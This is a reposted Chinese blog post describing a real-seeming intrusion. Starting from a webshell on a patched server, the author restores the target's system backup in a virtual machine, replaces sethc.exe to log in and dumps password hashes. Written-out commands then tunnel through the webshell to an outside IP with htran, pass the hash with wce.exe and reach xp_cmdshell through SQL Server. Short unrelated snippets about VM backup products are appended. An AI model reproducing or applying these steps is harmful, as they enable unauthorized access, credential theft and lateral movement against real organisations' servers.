另類提權 虛擬機器還原備份檔案抓hash

2021-12-30 00:50:46 字數 736 閱讀 9156

豬三哥那看到的,再次驗證滲透玩的是思路,學習下   

一頭豬,搞到webshell~補丁很全,無神馬缺陷,裝了個微軟ftp,sql2005,常規辦法無法提權,~一看d盤有乙個前天的系統bkf檔案~啊哦~copy 到web 目錄下回來~裝個虛擬豬還原bkf檔案~稍等片刻之後,虛擬豬就變成目標豬的系統了~無密碼登入呢~插入winpe光碟~替換sethc.exe ,重啟,按5次shift,新建帳號進入~抓hash,不幸的是超過14位,無法破解~等死嗎?肯定不能啦~既然有目標豬的hash了,還能死嗎?

ok,本地執行htran -s -listen 1234 5200,webshell執行htran -s -connect 222.222.222.222 1234

當然了,目標豬是可以上網的,ok 得到一條sock5**,222.222.222.222:5200

本地設定proxycap允許所有程式通過此**連線,然後wce.exe -s administrator:zhu:00000000000000000000000000000000:4a59cf37f6a2307d14aba1921e8bbfe6 替換hash

不要想著直接ipc,即使設定所有程式通過**連線,也掛不到系統核心的那些xx程式,開啟sql server management studio,填寫目標豬ip,選擇windows認證,ok,成功登陸目標的sql,然後就是神馬exec master..xp_cmdshell 神馬豬的了~

摘自 roge's blog

另類提權 虛擬機器還原備份檔案抓hash

豬三哥那看到的,再次驗證滲透玩的是思路,學習下 一頭豬,搞到webshell 補丁很全,無神馬缺陷,裝了個微軟ftp,sql2005,常規辦法無法提權,一看d盤有乙個前天的系統bkf檔案 啊哦 copy 到web 目錄下回來 裝個虛擬豬還原bkf檔案 稍等片刻之後,虛擬豬就變成目標豬的系統了 無密碼...

虛擬機器備份

虛擬機器備份 1 vpower的工作原理?將經過壓縮的備份作為普通的vmdk檔案發布直接從備份執行虛擬機器。建立乙個隔離的環境,用於應用項恢復 恢復驗證 測試及故障排查。2 什麼是veeam backup replication?提供先進的基於虛擬化的資料保護解決方案,同時支援vmware和hype...

Azure 中虛擬機器的備份和還原選項

可以通過定期建立備份來保護資料。有多個備份選項可用於 vm,具體取決於使用案例。若要備份執行生產工作負荷的 azure vm,請使用 azure 備份。azure 備份對 windows 和 linux vm 均支援應用程式一致性備份。azure 備份可建立恢復點,這些恢復點儲存在異地冗餘的恢復保管...